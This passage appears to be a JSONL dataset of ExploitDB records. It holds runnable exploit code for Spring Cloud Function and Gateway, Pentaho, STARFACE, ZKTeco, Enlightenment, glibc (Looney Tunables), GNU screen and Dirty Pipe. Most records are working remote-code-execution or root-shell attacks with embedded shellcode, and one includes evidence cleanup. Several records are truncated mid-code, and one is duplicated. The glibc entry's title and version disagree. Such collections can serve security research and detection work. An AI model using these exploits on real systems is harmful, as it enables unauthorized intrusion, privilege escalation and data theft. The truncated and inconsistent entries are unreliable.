required=True)\nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True)\nargs = parser.parse_args()\n\nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\")\n\nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command }\ndata = {\"data\": \"\"}\n\nrequest = requests.post(args.url, data=data, headers=headers)\nresponse = json.dumps(json.loads(request.text), indent=2)\nprint(response)", "cve_id": "CVE-2022-22963", "source": "exploitdb", "timestamp": "2023-07-11T00:00:00+00:00"} {"id": "4d8dbc444e0be26d7fcd", "text": "Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n# Google Dork: N/A\n# Date: 03/03/2022\n# Exploit Author: Carlos E. Vieira\n# Vendor Homepage: https://spring.io/\n# Software Link: https://spring.io/projects/spring-cloud-gateway\n# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1\n# Tested on: 3.1.0\n# CVE : CVE-2022-22947\n\nimport random\nimport string\nimport requests\nimport json\nimport sys\nimport urllib.parse\nimport base64\n\nheaders = { \"Content-Type\": \"application/json\" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}\nproxies = {\n 'http': 'http://172.29.32.1:8081',\n 'https': 'http://172.29.32.1:8081',\n}\nid = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\n\ndef exploit(url, command):\n\n payload = { \"id\": id, \"filters\": [{ \"name\": \"AddResponseHeader\", \"args\": { \"name\": \"Result\", \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\\u0022\"+command+\"\\u0022).getInputStream()))}\"}}],\"uri\": \"http://example.com\"}\n\n commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')\n\n rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)\n if(rbase.status_code == 201):\n print(\"[+] Stage deployed to /actuator/gateway/routes/\"+id)\n print(\"[+] Executing command...\")\n r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n print(\"[+] getting result...\")\n r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n get_response = r.json()\n clean(url, id)\n return get_response['filters'][0].split(\"'\")[1]\n else:\n print(\"[-] Error: Invalid response\")\n clean(url, id)\n exit(1)\n else:\n clean(url, id)\n print(\"[-] Error executing command\")\n\n\ndef clean(url, id):\n remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(remove.status_code == 200):\n print(\"[+] Stage removed!\")\n else:\n print(\"[-] Error: Fail to remove stage\")\n\ndef banner():\n print(\"\"\"\n ###################################################\n # #\n # Exploit for CVE-2022-22947 #\n # - Carlos Vieira (Crowsec) #\n # #\n # Usage: #\n # python3 exploit.py #\n # #\n # Example: #\n # python3 exploit.py http://localhost:8080 'id' #\n # #\n ###################################################\n \"\"\")\n\ndef main():\n banner()\n if len(sys.argv) != 3:\n print(\"[-] Error: Invalid arguments\")\n print(\"[-] Usage: python3 exploit.py \")\n exit(1)\n else:\n url = sys.argv[1]\n command = sys.argv[2]\n print(exploit(url, command))\nif __name__ == '__main__':\n main()", "cve_id": "CVE-2022-22947", "source": "exploitdb", "timestamp": "2022-03-07T00:00:00+00:00"} {"id": "8498d3ffb854116f4b29", "text": "Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)\n\n# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)\n# Author: dwbzn\n# Date: 2022-04-04\n# Vendor: https://www.hitachivantara.com/\n# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html\n# Version: Pentaho BA Server 9.3.0.0-428\n# CVE: CVE-2022-43769, CVE-2022-43939\n# Tested on: Windows 11\n# Credits: https://research.aurainfosec.io/pentest/pentah0wnage\n# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).\n\n# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)\nimport requests\nimport argparse\n\nparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')\nparser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')\nparser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)\nargs = parser.parse_args()\n\nurl = f\"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a\"\n\nprint (\"running...\")\nr = requests.get(url)\nif r.text == 'false':\n print (\"command should've executed! nice.\")\nelse:\n print (\"didn't work. sadge...\")", "cve_id": "CVE-2022-43939", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "8498d3ffb854116f4b29", "text": "Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)\n\n# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)\n# Author: dwbzn\n# Date: 2022-04-04\n# Vendor: https://www.hitachivantara.com/\n# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html\n# Version: Pentaho BA Server 9.3.0.0-428\n# CVE: CVE-2022-43769, CVE-2022-43939\n# Tested on: Windows 11\n# Credits: https://research.aurainfosec.io/pentest/pentah0wnage\n# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).\n\n# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)\nimport requests\nimport argparse\n\nparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')\nparser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')\nparser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)\nargs = parser.parse_args()\n\nurl = f\"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a\"\n\nprint (\"running...\")\nr = requests.get(url)\nif r.text == 'false':\n print (\"command should've executed! nice.\")\nelse:\n print (\"didn't work. sadge...\")", "cve_id": "CVE-2022-43769", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "aa2c7a7d55d4184b0a76", "text": "STARFACE 7.3.0.10 - Authentication with Password Hash Possible\n\nExploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible\nAffected Versions: 7.3.0.10 and earlier versions\nFixed Versions: -\nVulnerability Type: Broken Authentication\nSecurity Risk: low\nVendor URL: https://www.starface.de\nVendor Status: notified\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004\nAdvisory Status: published\nCVE: CVE-2023-33243\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243\n\n\nIntroduction\n============\n\n\"When functionality and comfort come together, the result is a\nstate-of-the-art experience that we've dubbed 'comfortphoning'. It's a\nsecure, scalable digital communication solution that meets every need\nand wish. STARFACE is easy to integrate into existing IT systems and\nflexibly grows with your requirements.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nThe image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from\nthe vendor's homepage [1]. The included files can be further examined by\neither extracting the contents or running the image in a virtual\nmachine. The web interface of the PBX uses the JavaScript file at the\nfollowing path to submit the login form:\n\n------------------------------------------------------------------------\njs/prettifier.js\n------------------------------------------------------------------------\n\nThe following two lines of the JavaScript file \"prettifier.js\" add the\ntwo parameters \"secret\" and \"ack\" to the form before being submitted:\n\n------------------------------------------------------------------------\n$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));\n$form(document.forms[0]).add('ack', defaultVals.k);\n------------------------------------------------------------------------\n\nThe JavaScript object \"defaultVals\" is included in the web application's\nsource text. While the value of \"defaultVals.k\" was found to be the\nstatic hash of the PBX version, the value of \"defaultVals.bk\" contains a\nnonce only valid for the currently used session. Therefore, the form\nparameter \"ack\" is always the same value. For the form value \"secret\"\nthe function \"createHash()\" is called with different arguments. The\nvalue of \"defaultVals.isAd\" is set to \"false\" when login via Active\nDirectory is disabled. The parameters \"liv\" and \"lpv\" contain the\nusername and password entered into the form respectively.\n\n------------------------------------------------------------------------\nconst createHash = function (isAD, user, pass, nonces) {\n if (isAD) {\n return forAD.encode(user + nonces + pass);\n }\n return user + ':' + forSF(user + nonces + forSF(pass));\n};\n------------------------------------------------------------------------\n\nThe expression right after the second return statement is the\nimplementation used when Active Directory login is disabled which is the\ndefault setting. The return value is composed of the username separated\nvia a colon from a value built using the \"forSF()\" function. The\n\"forSF()\" function was found to calculate the SHA512 hash value. When\nconsidering the arguments passed to the function, the hash is calculated\nas follows:\n\n------------------------------------------------------------------------\nSHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))\n------------------------------------------------------------------------\n\nAs can be seen, instead of the cleartext password the SHA512 hash of the\npassword is used in the calculation. In conclusion, for the form value\n\"secret\" the following value is transmitted:\n\n------------------------------------------------------------------------\nusername + \":\" + SHA512(\n username + defaultVals.k + defaultVals.bk + SHA512(password)\n)\n------------------------------------------------------------------------\n\nIf the SHA512 hash of a user's password is known, it can be directly\nused in the calculation of the \"secret\" during the login process.\nKnowledge of the cleartext password is not required.\n\nThis finding was also verified by analysing the decompiled Java code of\nthe server component. It was also found that the authentication process\nof the REST API is vulnerable in a very similar manner.\n\n\nProof of Concept\n================\n\nThe following Python script can be used to perform a login by specifying\na target URL, a username and the associated password hash:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python3\n\nimport click\nimport hashlib\nimport re\nimport requests\nimport typing\n\n\ndef get_values_from_session(url, session) -> typing.Tuple[str, str]:\n k, bk = \"\", \"\"\n response_content = session.get(f\"{url}/jsp/index.jsp\").text\n k_result = re.search(\"\\sk : '([^']+)'\", response_content)\n bk_result = re.search(\"\\sbk : '([^']+)'\", response_content)\n if k_result != None:\n k = k_result.group(1)\n if bk_result != None:\n bk = bk_result.grou", "cve_id": "CVE-2023-33243", "source": "exploitdb", "timestamp": "2023-06-04T00:00:00+00:00"} {"id": "0c786e90b6307efca902", "text": "ZKTeco ZEM/ZMM 8.88 - Missing Authentication\n\n# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication\n# Exploit Author: RedTeam Pentesting GmbH\n# CVE: CVE-2022-42953\nAdvisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface\n\nThe ZKTeco time attendance device does not require authentication to use the\nweb interface, exposing the database of employees and their credentials.\n\n\nDetails\n=======\n\nProduct: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM\nAffected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)\nFixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)\nVulnerability Type: Missing Authentication\nSecurity Risk: medium\nVendor URL: https://zkteco.eu/company/history\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003\nAdvisory Status: published\nCVE: CVE-2022-42953\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953\n\n\nIntroduction\n============\n\n\"Time attendance and workforce management is an integrated set of\nprocesses that an institution uses to optimize the productivity of its\nemployees on the individual, departmental, and entity-wide levels.\nZKTeco has been at the forefront of time attendance solutions for the\nlast 30 years, integrating advanced biometric technologies with\ninnovative and versatile terminals.\" (from company website)\n\n\nMore Details\n============\n\n\nThe ZKTeco ZEM/ZMM device allows to store a list of users and their credentials\nwhich may be used to log into the device to prove the users' attendance. These\ncredentials can either be a PIN, a card for a variety of card readers, or a\nfingerprint. The user list can be managed through the web interface.\n\nWhen opening the web interface, for example on http://192.0.2.1/,\nthe web server of the device sends a Set-Cookie header for a cookie with\nname and value similar to the following:\n\n-----------------------------------------------------------------------\nSet-Cookie: SessionID=1624553126; path=/;\n-----------------------------------------------------------------------\n\nIt was determined that the value of the cookie is roughly the number of\nseconds since January 1, 1970. Since the value has a constant offset,\nthat might allow attackers to guess the cookie value. After setting the\ncookie, the webserver redirects the browser to \"/csl/login\". The login\nform provided at this URL has its form action set to \"/csl/check\". If\nthe user provides wrong credentials, the web server responds with an\nerror message. If the user provides correct credentials, the server\nresponds with a frameset.\n\nIn this frameset various options are available, for example a user list.\nThe list contains a link titled \"Options\" for each user item which\nreferences a URL similar to the following\n\nhttp://192.0.2.1/csl/user?did=0&uid=123\n\nAdditionally, backups of all settings of the device can be downloaded\nfrom the backup page. The request to do so looks similar to the\nfollowing:\n-----------------------------------------------------------------------\nPOST /form/DataApp HTTP/1.1\nHost: 192.0.2.1\nUser-Agent: Mozilla/5.0\nCookie: SessionID=1624553126\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 7\nOrigin: http://192.0.2.1\nReferer: http://192.0.2.1/form/Device?act=11\n\nstyle=1\n-----------------------------------------------------------------------\n\nWhen the value \"1\" is given for the field named \"style\", the web server\nresponds with the file \"device.dat\" (corresponding to the option \"Backup\nSystem Data\" in the web interface), for all other values the server\nresponds with the file \"data.dat\" (corresponding to the option \"Backup\nUser Data\" in the web interface). Both files can not only be requested\nusing HTTP-POST, but also using HTTP-GET with the following URLs:\n\nhttp://192.0.2.1/form/DataApp?style=1\nhttp://192.0.2.1/form/DataApp?style=0\n\nBoth files are - even though it's not obvious from the filename -\ncompressed tar archives. They can be extracted in the following way:\n\n-----------------------------------------------------------------------\n$ mv data.dat data.tgz\n$ tar xvzf data.tgz\nrwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat\nrwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat\nrwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat\nrwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat\nrwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat\nrwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat\nrw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat\nrwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat\nrwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat\nrwxr-xr-x root/root 12", "cve_id": "CVE-2022-42953", "source": "exploitdb", "timestamp": "2023-03-28T00:00:00+00:00"} {"id": "7f25d8b17650d919554b", "text": "Enlightenment v0.25.3 - Privilege escalation\n\n## Exploit Title: Enlightenment v0.25.3 - Privilege escalation\n## Author: nu11secur1ty\n## Date: 12.26.2022\n## Vendor: https://www.enlightenment.org/\n## Software: https://www.enlightenment.org/download\n## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706\n## CVE ID: CVE-2022-37706\n## Description:\nThe Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.\nEnlightenment_sys in Enlightenment before 0.25.3 allows local users to\ngain privileges because it is setuid root,\nand the system library function mishandles pathnames that begin with a\n/dev/.. substring\nIf the attacker has access locally to some machine on which the\nmachine is installed Enlightenment\nhe can use this vulnerability to do very dangerous stuff.\n\n## STATUS: CRITICAL Vulnerability\n\n## Tested on:\n```bash\nDISTRIB_ID=Ubuntu\nDISTRIB_RELEASE=22.10\nDISTRIB_CODENAME=kinetic\nDISTRIB_DESCRIPTION=\"Ubuntu 22.10\"\nPRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\n```\n\n[+] Exploit:\n\n```bash\n#!/usr/bin/bash\n# Idea by MaherAzzouz\n# Development by nu11secur1ty\n\necho \"CVE-2022-37706\"\necho \"[*] Trying to find the vulnerable SUID file...\"\necho \"[*] This may take few seconds...\"\n\n# The actual problem\nfile=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)\nif [[ -z ${file} ]]\nthen\n\techo \"[-] Couldn't find the vulnerable SUID file...\"\n\techo \"[*] Enlightenment should be installed on your system.\"\n\texit 1\nfi\n\necho \"[+] Vulnerable SUID binary found!\"\necho \"[+] Trying to pop a root shell!\"\nmkdir -p /tmp/net\nmkdir -p \"/dev/../tmp/;/tmp/exploit\"\n\necho \"/bin/sh\" > /tmp/exploit\nchmod a+x /tmp/exploit\necho \"[+] Welcome to the rabbit hole :)\"\n\n${file} /bin/mount -o\nnoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),\n\"/dev/../tmp/;/tmp/exploit\" /tmp///net\n\nread -p \"Press any key to clean the evedence...\"\necho -e \"Please wait... \"\n\nsleep 5\nrm -rf /tmp/exploit\nrm -rf /tmp/net\necho -e \"Done; Everything is clear ;)\"\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)\n## Proof and Exploit:\n[href](https://streamable.com/zflbgg)\n\n## Time spent\n`01:00:00`\n\n\n--\nSystem Administrator - Infrastructure Engineer\nPenetration Testing Engineer\nExploit developer at https://packetstormsecurity.com/\nhttps://cve.mitre.org/index.html and https://www.exploit-db.com/\nhome page: https://www.nu11secur1ty.com/\nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\n nu11secur1ty ", "cve_id": "CVE-2022-37706", "source": "exploitdb", "timestamp": "2023-04-01T00:00:00+00:00"} {"id": "d9f5fdf85acd19500e7f", "text": "glibc 2.38 - Buffer Overflow\n\n# Exploit Title: glibc 2.38 - Buffer Overflow\n# Google Dork: N/A\n# Date: 2025-10-08\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://www.gnu.org/software/libc/\n# Software Link: https://ftp.gnu.org/gnu/libc/glibc-2.35.tar.gz\n# Version: glibc 2.35 (specifically 2.35-0ubuntu3.3 on Ubuntu 22.04.3 LTS)\n# Tested on: Ubuntu 22.04.3 LTS (glibc 2.35-0ubuntu3.3)\n# CVE : CVE-2023-4911\n\n# Description:\nLooney Tunables - glibc GLIBC_TUNABLES Environment Variable Buffer Overflow\n# This is a local privilege escalation exploit for CVE-2023-4911, also known as\n# \"Looney Tunables\", caused by a buffer overflow in the glibc dynamic loader's\n# environment variable parsing logic. The vulnerability is triggered by crafting\n# a maliciously long GLIBC_TUNABLES string which corrupts internal loader state,\n# allowing control over DT_RPATH and arbitrary shared object loading.\n#\n# This PoC creates a patched version of libc.so.6 with embedded shellcode and\n# abuses the loader to execute arbitrary code as root by invoking /usr/bin/su\n# with a malicious environment.\n#\n\n\n\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define FILL_SIZE 0xd00\n#define BOF_SIZE 0x600\n#define MAX_ENVP 0x1000\n\n// shellcode generado con pwntools\nconst unsigned char shellcode[] = {\n 0x48, 0x31, 0xff, // xor rdi,rdi\n 0x6a, 0x69, // push 0x69 ; syscall setuid\n 0x58, // pop rax\n 0x0f, 0x05, // syscall\n 0x48, 0x31, 0xff, // xor rdi,rdi\n 0x6a, 0x6a, // push 0x6a ; syscall setgid\n 0x58, // pop rax\n 0x0f, 0x05, // syscall\n 0x48, 0x31, 0xd2, // xor rdx, rdx\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e,\n 0x2f, 0x73, 0x68, 0x00, // mov rbx, \"/bin/sh\"\n 0x53, // push rbx\n 0x48, 0x89, 0xe7, // mov rdi, rsp\n 0x50, // push rax\n 0x57, // push rdi\n 0x48, 0x89, 0xe6, // mov rsi, rsp\n 0xb0, 0x3b, // mov al, 0x3b\n 0x0f, 0x05 // syscall\n};\n\nint64_t time_us() {\n struct timespec tms;\n if (clock_gettime(CLOCK_REALTIME, &tms)) return -1;\n int64_t micros = tms.tv_sec * 1000000;\n micros += tms.tv_nsec / 1000;\n if (tms.tv_nsec % 1000 >= 500) ++micros;\n return micros;\n}\n\nvoid patch_libc() {\n FILE *f = fopen(\"/lib/x86_64-linux-gnu/libc.so.6\", \"rb\");\n if (!f) { perror(\"fopen\"); exit(1); }\n\n fseek(f, 0, SEEK_END);\n long size = ftell(f);\n rewind(f);\n\n unsigned char *data = malloc(size);\n if (fread(data, 1, size, f) != size) {\n perror(\"fread\");\n exit(1);\n }\n fclose(f);\n\n Elf64_Ehdr *ehdr = (Elf64_Ehdr *)data;\n Elf64_Shdr *shdr = (Elf64_Shdr *)(data + ehdr->e_shoff);\n Elf64_Sym *symtab = NULL;\n char *strtab = NULL;\n\n for (int i = 0; i < ehdr->e_shnum; ++i) {\n if (shdr[i].sh_type == SHT_SYMTAB) {\n symtab = (Elf64_Sym *)(data + shdr[i].sh_offset);\n strtab = (char *)(data + shdr[shdr[i].sh_link].sh_offset);\n break;\n }\n }\n\n if (!symtab || !strtab) {\n fprintf(stderr, \"[-] Failed to find symtab\\n\");\n exit(1);\n }\n\n Elf64_Addr target_addr = 0;\n for (int i = 0; i < shdr->sh_size / sizeof(Elf64_Sym); ++i) {\n if (strcmp(&strtab[symtab[i].st_name], \"__libc_start_main\") == 0) {\n target_addr = symtab[i].st_value;\n break;\n }\n }\n\n if (!target_addr) {\n fprintf(stderr, \"[-] Could not find __libc_start_main\\n\");\n exit(1);\n }\n\n // patch shellcode at the symbol location\n memcpy(data + target_addr, shellcode, sizeof(shellcode));\n\n f = fopen(\"./libc.so.6\", \"wb\");\n if (!f) { perror(\"fopen (write)\"); exit(1); }\n fwrite(data, 1, size, f);\n fclose(f);\n\n free(data);\n printf(\"[+] Patched libc.so.6 written.\\n\");\n}\n\nint main(void) {\n char filler[FILL_SIZE], kv[BOF_SIZE], filler2[BOF_SIZE + 0x20], dt_rpath[0x20000];\n char *argv[] = {\"/usr/bin/su\", \"--help\", NULL};\n char *envp[MAX_ENVP] = { NULL };\n\n // Create directory and patched libc if not present\n if (mkdir(\"\\\"\", 0755) == 0) {\n patch_libc();\n int sfd = open(\"./libc.so.6\", O_RDONLY);\n int dfd = open(\"\\\"/libc.so.6\", O_CREAT | O_WRONLY, 0755);\n char buf[0x1000];\n int len;\n while ((len = read(sfd, buf, sizeof(buf))) > 0) {\n write(dfd, buf, len);\n ", "cve_id": "CVE-2023-4911", "source": "exploitdb", "timestamp": "2026-02-11T00:00:00+00:00"} {"id": "ecc3dcce3622d92159db", "text": "GNU screen v4.9.0 - Privilege Escalation\n\n# Exploit Title: GNU screen v4.9.0 - Privilege Escalation\n# Date: 03.02.2023\n# Exploit Author: Manuel Andreas\n# Vendor Homepage: https://www.gnu.org/software/screen/\n# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz\n# Version: 4.9.0\n# Tested on: Arch Linux\n# CVE : CVE-2023-24626\n\nimport os\nimport socket\nimport struct\nimport argparse\nimport subprocess\nimport pty\nimport time\n\nSOCKDIR_TEMPLATE = \"/run/screens/S-{}\"\nMAXPATHLEN = 4096\nMAXTERMLEN = 32\nMAXLOGINLEN = 256\nSTRUCTSIZE = 12584\nMSG_QUERY = 9\n\ndef find_latest_socket(dir):\n return f\"{dir}/{sorted(os.listdir(dir))[-1]}\"\n\n\ndef build_magic(ver=5):\n return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver\n\n\ndef build_msg(type):\n return struct.pack(\"\n *\n * Proof-of-concept exploit for the Dirty Pipe\n * vulnerability (CVE-2022-0847) caused by an uninitialized\n * \"pipe_buffer.flags\" variable. It demonstrates how to overwrite any\n * file contents in the page cache, even if the file is not permitted\n * to be written, immutable or on a read-only mount.\n *\n * This exploit requires Linux 5.8 or later; the code path was made\n * reachable by commit f6dd975583bd (\"pipe: merge\n * anon_pipe_buf*_ops\"). The commit did not introduce the bug, it was\n * there before, it just provided an easy way to exploit it.\n *\n * There are two major limitations of this exploit: the offset cannot\n * be on a page boundary (it needs to write one byte before the offset\n * to add a reference to this page to the pipe), and the write cannot\n * cross a page boundary.\n *\n * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\\nssh-ed25519 AAA......\\n'\n *\n * Further explanation: https://dirtypipe.cm4all.com/\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n// small (linux x86_64) ELF file matroshka doll that does;\n// fd = open(\"/tmp/sh\", O_WRONLY | O_CREAT | O_TRUNC);\n// write(fd, elfcode, elfcode_len)\n// chmod(\"/tmp/sh\", 04755)\n// close(fd);\n// exit(0);\n//\n// the dropped ELF simply does:\n// setuid(0);\n// setgid(0);\n// execve(\"/bin/sh\", [\"/bin/sh\", NULL], [NULL]);\nunsigned char elfcode[] = {\n\t/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,\n\t0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,\n\t0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,\n\t0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,\n\t0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,\n\t0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,\n\t0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,\n\t0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,\n\t0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n\t0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0xba, 0x00, 